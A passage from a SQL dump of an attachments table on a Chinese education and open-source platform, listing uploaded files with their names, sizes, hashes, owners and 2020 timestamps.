14:07:51','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1052,255,'Project','micROS开发者指南V1.4.pdf','200319140755_84f3600429e589927b73830680996fd2.pdf',677195,NULL,'ab526537f113601c355b4b8cdc80a64b',2,76,'2020-03-19 14:07:55','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1055,255,'Project','关于重启后运行失败的说明.pdf','200319140806_c0e493d6ca62e4869024cf5286c6bf3a.pdf',65963,NULL,'b7c18dc02cfd6aeba3d10b93e1b4a62a',1,76,'2020-03-19 14:08:06','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1058,255,'Project','深之蓝适配程序依赖软件安装说明.pdf','200319140834_ddd4df72ab06ef3d127782464a0ab84d.pdf',53248,NULL,'4e0c9d70f0877e4813769d8857e2b9d6',3,76,'2020-03-19 14:08:34','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1059,95,'Task','AppScanGettingStarted_zh-CHS.pdf','200323085323_AppScanGettingStarted_zh-CHS.pdf',3723624,'','de9b5b39b130e8c9951cc06cc6836095',1,49,'2020-03-23 08:53:23',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1060,101,'Task','新建文本文档.txt','200323091501_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,49,'2020-03-23 09:15:01',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1061,101,'Task','更新日志.txt','200323091612_40a7d2aceb0f99c46c03327e631a3acf.txt',188,'','714dd534bcf4bbe56dabf9402b8c8e96',0,49,'2020-03-23 09:16:12',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1062,133,'Paper','InstallLog.log','200323102038_InstallLog.log',846,'','15dccdca5154dd1f1ad0f70309e9b154',0,73,'2020-03-23 10:20:38',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1063,134,'Paper','.gitconfig','200323102238_.gitconfig',50,'','eb11fbfd0c0664ee04622237c27c091e',0,63,'2020-03-23 10:22:38',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1064,100,'Task','新建文本文档.txt','200323102950_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,49,'2020-03-23 10:29:50',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1584930630,NULL),(1065,100,'Task','新建文本文档.txt','200323103900_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,1,'2020-03-23 10:39:00',NULL,'2020/03',3,1,NULL,NULL,1,NULL,0,0,NULL),(1066,92,'Task','新建文本文档.txt','200323104142_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,1,'2020-03-23 10:41:42',NULL,'2020/03',3,1,NULL,NULL,1,NULL,0,0,NULL),(1067,100,'Task','新建文本文档.txt','200323104217_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,1,'2020-03-23 10:42:17',NULL,'2020/03',4,1,NULL,NULL,1,NULL,0,0,NULL),(1068,NULL,NULL,'AppScanGettingStarted_zh-CHS.pdf','200323145157_AppScanGettingStarted_zh-CHS.pdf',3723624,'','de9b5b39b130e8c9951cc06cc6836095',0,46,'2020-03-23 14:51:57',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1070,137,'Paper','HaoZip.exe','200323145629_HaoZip.exe',1219192,'','31ab9a805e9a52305b7cf50932b0cc98',0,63,'2020-03-23 14:56:29',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1071,105,'Task','新建文本文档.txt','200324082221_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',404,'','45127469d94e1b272eb016147db572b1',0,49,'2020-03-24 08:22:21',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1072,108,'Task','InstallLog.log','200324171131_InstallLog.log',846,'','15dccdca5154dd1f1ad0f70309e9b154',0,49,'2020-03-24 17:11:31',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585041168,NULL),(1073,104,'Task','InstallLog.log','200324171843_InstallLog.log',846,'','15dccdca5154dd1f1ad0f70309e9b154',0,49,'2020-03-24 17:18:43',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585041536,NULL),(1074,105,'Task','.gitconfig','200325091851_.gitconfig',50,'','eb11fbfd0c0664ee04622237c27c091e',0,49,'2020-03-25 09:18:51',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585099176,NULL),(1075,95,'Task','putty.jpg','200325160801_putty.jpg',2629441,'','f143750e724d05eab8688a29daca7517',2,49,'2020-03-25 16:08:01',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585123725,NULL),(1076,96,'Task','putty03.PNG','200325161603_putty03.PNG',159136,'','0960ee200308f7d3e3ad202f8dd9b0ca',2,49,'2020-03-25 16:16:03',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585124269,NULL),(1077,98,'Task','putty03.PNG','200325162119_putty03.PNG',159136,'','0960ee200308f7d3e3ad202f8dd9b0ca',2,49,'2020-03-25 16:21:19',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585124746,NULL),(1078,99,'Task','AppScanGettingStarted_zh-CHS.pdf','200325163404_AppScanGettingStarted_zh-CHS.pdf',3723624,'','de9b5b39b130e8c9951cc06cc6836095',0,46,'2020-03-25 16:34:04',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585125305,NULL),(1079,99,'Task','LinuxProbe.pdf','200325163947_LinuxProbe.pdf',17176352,'','cfe845fba046b0b8424fa0ccb7a39485',0,49,'2020-03-25 16:39:47',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585125633,NULL),(1080,99,'Task','LinuxProbe.pdf','200325164209_LinuxProbe.pdf',17176352,'','cfe845fba046b0b8424fa0ccb7a39485',0,49,'2020-03-25 16:42:09',NULL,'2020/03',2,1,NULL,NULL,1,NULL,0,1585125763,NULL),(1081,96,'Task','AppScanGettingStarted_zh-CHS.pdf','200327152856_AppScanGettingStarted_zh-CHS.pdf',3723624,'','de9b5b39b130e8c9951cc06cc6836095',0,46,'2020-03-27 15:28:56',NULL,'2020/03',3,1,NULL,NULL,1,NULL,0,0,NULL),(1082,98,'Task','Symantec Global Internet Security Threat Report..pdf','200327152916_3f7ffe6997d76441811c16e4acd1c139.pdf',2055497,'','f9dbd8020f6c8f1a2ee7589533f9ec02',0,46,'2020-03-27 15:29:16',NULL,'2020/03',3,1,NULL,NULL,1,NULL,0,0,NULL),(1083,99,'Task','AppScanGettingStarted_zh-CHS.pdf','200327152930_AppScanGettingStarted_zh-CHS.pdf',3723624,'','de9b5b39b130e8c9951cc06cc6836095',0,46,'2020-03-27 15:29:30',NULL,'2020/03',3,1,NULL,NULL,1,NULL,0,0,NULL),(1084,98,'Task','Rails处理流程.gif','200327153048_2d89b7d86fe7d3c74c095aea1c5f56da.gif',17391,'','3c2acdde6b85777789a771f81a70d2e0',0,46,'2020-03-27 15:30:48',NULL,'2020/03',4,1,NULL,NULL,1,NULL,0,0,NULL),(1085,99,'Task','Rails处理流程.gif','200327153100_2d89b7d86fe7d3c74c095aea1c5f56da.gif',17391,'','3c2acdde6b85777789a771f81a70d2e0',0,46,'2020-03-27 15:31:00',NULL,'2020/03',4,1,NULL,NULL,1,NULL,0,0,NULL),(1086,NULL,NULL,'Rails处理流程.gif','200327153236_2d89b7d86fe7d3c74c095aea1c5f56da.gif',17391,'','3c2acdde6b85777789a771f81a70d2e0',0,46,'2020-03-27 15:32:36',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1087,103,'Task','AutoResponder.xml','200402153607_AutoResponder.xml',222,'','cdd5d50d68afbea4e368a53a365849dc',0,49,'2020-04-02 15:36:07',NULL,'2020/04',2,1,NULL,NULL,1,NULL,0,1585812976,NULL),(1088,NULL,NULL,'下载.html','200403105847_393d133ab4becea0a23bfcaab512f2c1.html',49429,'','fe589218b1140a369ee3f5241b8bf085',0,1,'2020-04-03 10:58:47',NULL,'2020/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(1089,114,'Task','竞赛封面.jpg','200410100113_ce51eaf86c0522b2f28a803a57efb08f.jpg',72365,'','9069ee34508220af46105bfe29c7cde9',3,49,'2020-04-10 10:01:13',NULL,'2020/04',2,1,NULL,NULL,1,NULL,0,1586484087,NULL),(1090,NULL,NULL,'07612e4ecafb1d3eab5255eec80548c6_1556501528.xls','200804172224_07612e4ecafb1d3eab5255eec80548c6_1556501528.xls',12920,'','07612e4ecafb1d3eab5255eec80548c6',0,48,'2020-08-04 17:22:24',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1091,NULL,NULL,'å_¬äº¤å_©æ__-æ_°æ_®åº_设计模æ_¿.docx','200804172356_92a9368c357ce9de8c5273164825a3ab.docx',121036,'','b5910dcad2a1282b14a7048c13ac4a6b',0,48,'2020-08-04 17:23:56',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1092,NULL,NULL,'u=3774129818,3313714630&fm=26&gp=0 (1).jpg','200804172620_584c5701fcb8f8d045a45d2fa7cec219.jpg',7038,'','7caffe9174d560281f58b69a767b3f6b',0,48,'2020-08-04 17:26:20',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1096,NULL,NULL,'EduCoder小程序操作说明.pdf','200810141719_47d082bb655567046ffc103df7fa4c8b.pdf',1630809,'application/pdf','eb82339c83e35a761053e9f670a726e6',0,50,'2020-08-10 14:17:19',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1097,NULL,NULL,'f56513788384645db768d0ec542dec33_r.jpg','200813144354_f56513788384645db768d0ec542dec33_r.jpg',99260,'','f56513788384645db768d0ec542dec33',1,1,'2020-08-13 14:43:54',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1099,12,'ForumSection','QQ浏览器截图20191207193512.png','200814171001_4a28a847012e091716f492f0c4148812.png',25690,'','c81b02c9b3fefa765d339e3ab9570156',35,1,'2020-08-14 17:10:01',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1122,3,'Notice','无人机大赛规则.docx','200817092706_af3c0349e575f7a6175348d70992f6e8.docx',17486,'','a7b0c8fc54b73ca4acc19246f42e7945',0,1,'2020-08-17 09:27:06',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1170,6,'Competition','db57b7d78b9d80e1afc294912a6cffda.jpg','200817110147_db57b7d78b9d80e1afc294912a6cffda.jpg',781869,'','97ea29e81c2315750c7e66c419288ad7',13,1,'2020-08-17 11:01:47',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1173,24,'Competition','7e61ea2c28c1e6aee81c9093195d94b0.jpg','200817153249_7e61ea2c28c1e6aee81c9093195d94b0.jpg',1076897,'','b85a01e34b8e26bbbefa3a597e167191',17,1,'2020-08-17 15:32:49',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1175,15,'Competition','244dc7003e7d9ce0b8b5fa27c1cb95e1.jpg','200817153419_244dc7003e7d9ce0b8b5fa27c1cb95e1.jpg',1071627,'','a4ff398a8af82d210727169ec7385d86',15,1,'2020-08-17 15:34:19',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1176,13,'ForumSection','无人机.PNG','200817161708_5e4a23ce4ce808e781a7f863c90df166.PNG',110442,'','03b0db4c313419951a681bb2886a339b',515,1,'2020-08-17 16:17:08',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1177,14,'ForumSection','大数据.PNG','200817162256_5cb520e58a4ce49f63d52578902bcb72.PNG',368908,'','54081f6ce148c292270768be75c6f1d6',398,1,'2020-08-17 16:22:56',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1178,21,'ForumSection','云计算.PNG','200817162911_e94bdd688056f8257cd696d03e23c72f.PNG',211145,'','cbab61dec4ed8ad68cfebea55300316d',493,1,'2020-08-17 16:29:11',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1180,NULL,NULL,'image.png','828f538212855aaac24ffc7808ea82f1_1597831426258.png',14265,'image/png','828f538212855aaac24ffc7808ea82f1_1597831426258',1,1,'2020-08-19 10:03:46',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1181,NULL,NULL,'f56513788384645db768d0ec542dec33_r.jpg','f56513788384645db768d0ec542dec33_1597831827872.jpg',99260,'image/jpeg','f56513788384645db768d0ec542dec33_1597831827872',1,1,'2020-08-19 10:10:27',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1182,NULL,NULL,'f56513788384645db768d0ec542dec33_r.jpg','f56513788384645db768d0ec542dec33_1597831842533.jpg',99260,'image/jpeg','f56513788384645db768d0ec542dec33_1597831842533',1,1,'2020-08-19 10:10:42',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1183,NULL,NULL,'image.png','d99c86bdc0e8d64d54ff34d4d9296ed3_1597884756715.png',510621,'image/png','d99c86bdc0e8d64d54ff34d4d9296ed3_1597884756715',3,1,'2020-08-20 00:52:36',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1184,NULL,NULL,'image.png','bef5afdfa91ecca27cc8cdcf6a375a5b_1597884782428.png',550554,'image/png','bef5afdfa91ecca27cc8cdcf6a375a5b_1597884782428',3,1,'2020-08-20 00:53:02',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1185,NULL,NULL,'image.png','55290618232577aa407961346c3964d0_1597885197663.png',452561,'image/png','55290618232577aa407961346c3964d0_1597885197663',8,1,'2020-08-20 00:59:57',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1186,NULL,NULL,'image.png','5ad835797b9eb85cbfab47b04a497493_1597885247700.png',392212,'image/png','5ad835797b9eb85cbfab47b04a497493_1597885247700',5,1,'2020-08-20 01:00:47',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1187,NULL,NULL,'image.png','b304e651960c38676703141d6ed8fd46_1597885272138.png',286887,'image/png','b304e651960c38676703141d6ed8fd46_1597885272138',5,1,'2020-08-20 01:01:12',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1188,NULL,NULL,'image.png','4b5266c7aeb194ad676f2be1c40ba914_1597885401874.png',1533646,'image/png','4b5266c7aeb194ad676f2be1c40ba914_1597885401874',4,1,'2020-08-20 01:03:21',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1189,NULL,NULL,'image.png','9606422b4f22f180475b8434bdba372a_1597885680604.png',582213,'image/png','9606422b4f22f180475b8434bdba372a_1597885680604',8,1,'2020-08-20 01:08:00',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1191,NULL,NULL,'微信图片_202008170858091.jpg','200820092117_aa9f487255a38a5a471e13acb8bc5482.jpg',199466,'','12e574d850a9f777976349269792028e',0,1,'2020-08-20 09:21:17',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1192,NULL,NULL,'image.png','5b881f51d1e2e4278a03790927b3bc23_1597886862537.png',152876,'image/png','5b881f51d1e2e4278a03790927b3bc23_1597886862537',5,1,'2020-08-20 01:27:42',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1193,5,'HomeSection','plate.png','200820105352_plate.png',59134,'','b18df489f3333a25ea7f8c92287c0708',170,1,'2020-08-20 10:53:52',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1194,191,'Issue','f56513788384645db768d0ec542dec33_r.jpg','f56513788384645db768d0ec542dec33_1597892709420.jpg',99260,'image/jpeg','f56513788384645db768d0ec542dec33_1597892709420',1,47,'2020-08-20 03:05:09','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1196,191,'Issue','dog1.gif','9ab41a2f17ca092659f7722306756bdf_1597892726110.gif',12260,'image/gif','9ab41a2f17ca092659f7722306756bdf_1597892726110',1,47,'2020-08-20 03:05:26','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1197,6,'HomeSection','space.png','200820115158_space.png',39246,'','50b34bf65189104340522d26bdff6ace',155,1,'2020-08-20 11:51:58',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1198,7,'HomeSection','activate.png','200820115248_activate.png',43218,'','f6bee066332e3fc3047c23ada072d0e6',145,1,'2020-08-20 11:52:48',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1199,8,'HomeSection','forums.png','200820115328_forums.png',35170,'','e5d817831d27f69df857983f78abbfc9',140,1,'2020-08-20 11:53:28',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1201,NULL,NULL,'image.png','fef36bdb694906959a192f9e3955a70e_1597924686004.png',1744100,'image/png','fef36bdb694906959a192f9e3955a70e_1597924686004',6,1,'2020-08-20 11:58:06',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1202,NULL,NULL,'image.png','fef36bdb694906959a192f9e3955a70e_1597924691639.png',1744100,'image/png','fef36bdb694906959a192f9e3955a70e_1597924691639',1,1,'2020-08-20 11:58:11',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1204,NULL,NULL,'image.png','06b5f1ff48a2cf2fb505f080e9b5b29c_1597969176589.png',367447,'image/png','06b5f1ff48a2cf2fb505f080e9b5b29c_1597969176589',7,1,'2020-08-21 00:19:36',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1205,NULL,NULL,'image.png','83e67cc6073c1fe5ddbf433c71fbd4ed_1597969523173.png',274758,'image/png','83e67cc6073c1fe5ddbf433c71fbd4ed_1597969523173',6,1,'2020-08-21 00:25:23',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1206,NULL,NULL,'image.png','7440cc0d73772f875a2cdbaff9cd4c0c_1597970334195.png',485930,'image/png','7440cc0d73772f875a2cdbaff9cd4c0c_1597970334195',6,1,'2020-08-21 00:38:54',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1207,NULL,NULL,'image.png','c647c58e1d19af6d15d463cc0bd60a86_1597970754194.png',215884,'image/png','c647c58e1d19af6d15d463cc0bd60a86_1597970754194',3,1,'2020-08-21 00:45:54',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1208,NULL,NULL,'image.png','265c2f565e5ca071e79e19800a751bbe_1597971012205.png',377989,'image/png','265c2f565e5ca071e79e19800a751bbe_1597971012205',5,1,'2020-08-21 00:50:12',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1209,NULL,NULL,'image.png','8b386cbd07c219f8f863b2b4466eb21f_1597971263548.png',73616,'image/png','8b386cbd07c219f8f863b2b4466eb21f_1597971263548',7,1,'2020-08-21 00:54:23',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1210,NULL,NULL,'001.png','200821090703_001.png',163725,'','63f772e6dbbf4349e4a902614dda69db',0,1,'2020-08-21 09:07:03',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1211,22,'Notice','无人机大赛规则.docx','200821090755_af3c0349e575f7a6175348d70992f6e8.docx',6762,'','3a4250ee2bb1b62ef95ba2c6da366b83',1,1,'2020-08-21 09:07:55',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1212,27,'Notice','无法删帖.png','200821090832_651f985f23156ea353997a8aa0244b73.png',58149,'','f39438e361bb0360620ec74ba5bd1251',0,1,'2020-08-21 09:08:32',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1213,NULL,NULL,'image.png','d9a740ca00a3d41d86cb35042867b215_1597972203396.png',187589,'image/png','d9a740ca00a3d41d86cb35042867b215_1597972203396',8,1,'2020-08-21 01:10:03',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1214,NULL,NULL,'image.png','39aefe9925163cb902b3d846dac0f862_1597972377746.png',134631,'image/png','39aefe9925163cb902b3d846dac0f862_1597972377746',10,1,'2020-08-21 01:12:57',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1215,NULL,NULL,'image.png','55b89030e56bc6d0b694c813583fbd21_1597975961451.png',105275,'image/png','55b89030e56bc6d0b694c813583fbd21_1597975961451',12,1,'2020-08-21 02:12:41',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1216,NULL,NULL,'image.png','30d278794be68013a8168a5d863f8995_1597975995399.png',329960,'image/png','30d278794be68013a8168a5d863f8995_1597975995399',12,1,'2020-08-21 02:13:15',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1217,NULL,NULL,'image.png','13a1521bfc21e305c2cbfe1d09faaf1e_1597994029534.png',158817,'image/png','13a1521bfc21e305c2cbfe1d09faaf1e_1597994029534',6,1,'2020-08-21 07:13:49',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1218,NULL,NULL,'03102dc0178bbd31702cee2d16390e2c','200821152829_03102dc0178bbd31702cee2d16390e2c',99260,'image/jpeg','f56513788384645db768d0ec542dec33',0,50,'2020-08-21 15:28:29',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1219,NULL,NULL,'35060eae24e75371100ef44973eaca9a','200821152847_35060eae24e75371100ef44973eaca9a',99260,'image/jpeg','f56513788384645db768d0ec542dec33',0,50,'2020-08-21 15:28:47',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1222,NULL,NULL,'4e51704ef89abb027a2be2a5a7b22aa6','200821153247_4e51704ef89abb027a2be2a5a7b22aa6',526402,'image/jpeg','60f4ee5e7f55b9157b995ec1321d3ae9',1,50,'2020-08-21 15:32:47',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1224,204,'Issue','论坛---标签不一致.PNG','7e054b958a1a69b865b03489ec94af1c_1598230985730.PNG',296782,'image/png','7e054b958a1a69b865b03489ec94af1c_1598230985730',2,46,'2020-08-24 01:03:05','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1225,NULL,NULL,'image.png','68adcd13c3e8c8d47f8ba6d95715e8bc_1598232530847.png',65756,'image/png','68adcd13c3e8c8d47f8ba6d95715e8bc_1598232530847',6,1,'2020-08-24 01:28:50',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1226,205,'Issue','论坛--版主不一致01.PNG','4526f18b70634a3f65e76a877f0c8b2b_1598232814371.PNG',112997,'image/png','4526f18b70634a3f65e76a877f0c8b2b_1598232814371',1,46,'2020-08-24 01:33:34','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1227,205,'Issue','论坛--版主不一致02.PNG','2a2f539faba06324657cc52086c003e9_1598232818460.PNG',71514,'image/png','2a2f539faba06324657cc52086c003e9_1598232818460',0,46,'2020-08-24 01:33:38','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1228,161,'Issue','开源项目——新建文件.PNG','786ea6b1f3a018d96081e01f6385905a_1598233243188.PNG',33031,'image/png','786ea6b1f3a018d96081e01f6385905a_1598233243188',3,46,'2020-08-24 01:40:43','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1229,161,'Issue','开源项目——新建文件03.PNG','60c7a541888ff8fcc20c9ca724e09f3b_1598233253518.PNG',181077,'image/png','60c7a541888ff8fcc20c9ca724e09f3b_1598233253518',0,46,'2020-08-24 01:40:53','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1230,161,'Issue','开源项目——新建文件04.PNG','957d2c89752136030edc81c280f22a55_1598233259006.PNG',220211,'image/png','957d2c89752136030edc81c280f22a55_1598233259006',2,46,'2020-08-24 01:40:59','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1231,207,'Issue','论坛版块管理--导航信息01.PNG','81eb1f117dc70e8bc0810c075e596fcf_1598234233828.PNG',48679,'image/png','81eb1f117dc70e8bc0810c075e596fcf_1598234233828',1,46,'2020-08-24 01:57:13','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1232,210,'Issue','开源项目--项目更新时间.PNG','f2421b91aa8da7f15fa6f4d0dd1e4d26_1598234640649.PNG',574952,'image/png','f2421b91aa8da7f15fa6f4d0dd1e4d26_1598234640649',1,46,'2020-08-24 02:04:00','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1233,211,'Issue','论坛--版块版主设置01.PNG','98ac36f724de1b9fad713467fceedc17_1598235575821.PNG',15423,'image/png','98ac36f724de1b9fad713467fceedc17_1598235575821',2,46,'2020-08-24 02:19:35','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1234,211,'Issue','论坛--版块版主设置02.PNG','f0518977845a69ee644281643cd9fae0_1598235581397.PNG',37233,'image/png','f0518977845a69ee644281643cd9fae0_1598235581397',2,46,'2020-08-24 02:19:41','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1236,NULL,NULL,'image.png','af9951759bc51e084490368df7b30460_1598236575640.png',237241,'image/png','af9951759bc51e084490368df7b30460_1598236575640',4,1,'2020-08-24 02:36:15',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1237,NULL,NULL,'image.png','767246520724cfcc23afa33f8c932f78_1598236659316.png',122216,'image/png','767246520724cfcc23afa33f8c932f78_1598236659316',4,1,'2020-08-24 02:37:39',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1238,212,'Issue','个人中心修改资料.PNG','8741eae45a272d3a210b29752fc5f8a7_1598239275892.PNG',177091,'image/png','8741eae45a272d3a210b29752fc5f8a7_1598239275892',1,46,'2020-08-24 03:21:15','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1239,168,'Issue','竞赛--后台无法修改标题.PNG','c585da956477974d70baa995f0b04058_1598252158687.PNG',6674,'image/png','c585da956477974d70baa995f0b04058_1598252158687',1,46,'2020-08-24 06:55:58','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1240,144,'Issue','管理--开源项目列表.PNG','8537b1dbcbed795b2ce609e0c3af1870_1598252430329.PNG',133992,'image/png','8537b1dbcbed795b2ce609e0c3af1870_1598252430329',1,46,'2020-08-24 07:00:30','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1241,149,'Issue','360浏览器点击评论.PNG','83ea0b61676415af6243870c4ffb1c15_1598254079451.PNG',52984,'image/png','83ea0b61676415af6243870c4ffb1c15_1598254079451',4,46,'2020-08-24 07:27:59','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1242,213,'Issue','论坛--最新帖子01.PNG','99976403a17d0a23b60f5ebb7ac1350a_1598255165556.PNG',169099,'image/png','99976403a17d0a23b60f5ebb7ac1350a_1598255165556',3,46,'2020-08-24 07:46:05','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1243,213,'Issue','论坛--最新帖子02.PNG','990bf2105066a256d656ba2618d64dc4_1598255170388.PNG',146377,'image/png','990bf2105066a256d656ba2618d64dc4_1598255170388',1,46,'2020-08-24 07:46:10','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1244,214,'Issue','论坛--帖子未经审批01.PNG','407dc36d39598562cb6c6967c3952cb6_1598256296186.PNG',180049,'image/png','407dc36d39598562cb6c6967c3952cb6_1598256296186',2,46,'2020-08-24 08:04:56','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1245,214,'Issue','论坛--帖子未经审批02.PNG','f61120d31140bb1717cfb7b06357bb3f_1598256301514.PNG',158671,'image/png','f61120d31140bb1717cfb7b06357bb3f_1598256301514',2,46,'2020-08-24 08:05:01','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1246,215,'Issue','精选版块推荐.PNG','7e3b43858d941389c3e6699fa5692748_1598258134376.PNG',93099,'image/png','7e3b43858d941389c3e6699fa5692748_1598258134376',6,46,'2020-08-24 08:35:34','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1247,217,'Issue','消息通知.PNG','94b26cb8c1b57ae7ae27dddcd6ed8297_1598260006241.PNG',82597,'image/png','94b26cb8c1b57ae7ae27dddcd6ed8297_1598260006241',2,46,'2020-08-24 09:06:46','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1248,NULL,NULL,'image.png','8e7eabab060e75ed963972df85856518_1598323399193.png',65503,'image/png','8e7eabab060e75ed963972df85856518_1598323399193',8,1,'2020-08-25 02:43:19',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1249,NULL,NULL,'image.png','89a3f98739cdc3271c36d0115363c3b8_1598323429840.png',97993,'image/png','89a3f98739cdc3271c36d0115363c3b8_1598323429840',8,1,'2020-08-25 02:43:49',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1250,NULL,NULL,'image.png','71dacc50d19fa76dec79fa4ab1842e9e_1598323495834.png',138274,'image/png','71dacc50d19fa76dec79fa4ab1842e9e_1598323495834',8,1,'2020-08-25 02:44:55',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1251,26,'Competition','08698315490b4d58bea8a6e86e90a601.jpg','200825111902_08698315490b4d58bea8a6e86e90a601.jpg',200134,'','123d3e9b56bf246f22be7eac0e507c0e',8,47,'2020-08-25 